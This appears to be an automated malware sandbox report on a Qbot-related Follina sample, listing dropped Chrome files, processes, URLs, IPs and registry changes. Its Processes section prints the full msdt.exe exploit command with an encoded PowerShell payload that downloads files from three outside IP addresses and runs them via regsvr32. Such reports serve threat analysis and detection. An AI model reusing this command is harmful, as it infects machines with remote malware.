Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Qbotfollina.html
|
HTML document, ASCII text, with very long lines, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\05ecd3b2-b9b6-4615-8da0-61857a45cdbb.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\1407162b-46f0-4f86-8672-b5bb5d6ef13e.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\148d2889-8d30-44d4-8b25-4acd45abbdd3.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\22104b31-e7f3-42fe-ad8e-a4890f404a1e.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\2bb3990c-e433-4e80-a92c-453c97f30a33.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\436c5d5e-dce5-4ed3-9529-765857d0ba82.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\546a1457-cc3f-4ec7-a92d-dc6c5a1d149a.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\5f2afbfc-f571-4e9f-9e57-9d743522af41.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\6f7f3e68-bf64-43fd-98fc-50372da0d07f.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\26ef0a44-1c96-421c-9319-03902ef14b1f.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\48c73de8-0090-4d04-9af6-227975bb8e5b.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\583af293-61ac-4894-a1f4-ebafda79de76.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\58592cb6-dd63-4405-a017-84c936c34d16.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\654a6c14-ca9a-428c-b8ac-1b1d127e1439.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6915fb29-f050-4a9c-a545-a34bad3e8ebf.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9bd124a4-8996-43ba-9d32-27257daa4c0d.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9f7bdcb5-c04d-4e05-b56c-8c6bb7a0b482.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\3fe43805-7be2-44a9-8b75-0ea976c2d5c7.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\b69ee39c-f2d4-4669-8779-99c284e2e4a3.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\be66d44b-572f-4980-92cc-64f177048431.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d9d70ad7-afcf-498e-a8c0-ce4f65f77a0f.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e8e9a481-0594-4ae5-9c57-fa513cb79866.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir3960_16912406\Ruleset Data
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\a6b47647-168f-44c8-9525-dae0f0c64acc.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\f3bb5787-3941-40d9-83e9-853eafddaa2d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\f9366ee1-81dc-42f1-b1be-e6eb13b4d535.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1210988044\Filtering Rules
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1210988044\LICENSE.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1210988044\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1210988044\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1210988044\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1497513409\LICENSE
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1497513409\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1497513409\crl-set
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1497513409\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_1497513409\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_162832123\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_162832123\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_162832123\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_162832123\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_2122077170\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_2122077170\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_2122077170\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_526055686\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_758096027\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_758096027\download_file_types.pb
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_758096027\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3960_758096027\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\b1f2020b-38cd-4a36-87c0-426567f6cda0.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\db6345c4-2474-41f9-a909-0f9135d23777.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir3960_444231350\db6345c4-2474-41f9-a909-0f9135d23777.tmp
|
Google Chrome extension, version 3
|
dropped
|
There are 129 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\Qbotfollina.html
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,9164953901427167469,2460945290142951251,131072
--lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://play.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
142.250.203.110
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
172.217.168.45
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://easylist.to/)
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://creativecommons.org/compatiblelicenses
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://github.com/easylist)
|
unknown
|
||
|
https://creativecommons.org/.
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
172.217.168.45
|
||
|
clients.l.google.com
|
142.250.203.110
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.168.45
|
accounts.google.com
|
United States
|
||
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
142.250.203.110
|
clients.l.google.com
|
United States
|
||
|
192.168.2.3
|
unknown
|
unknown
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
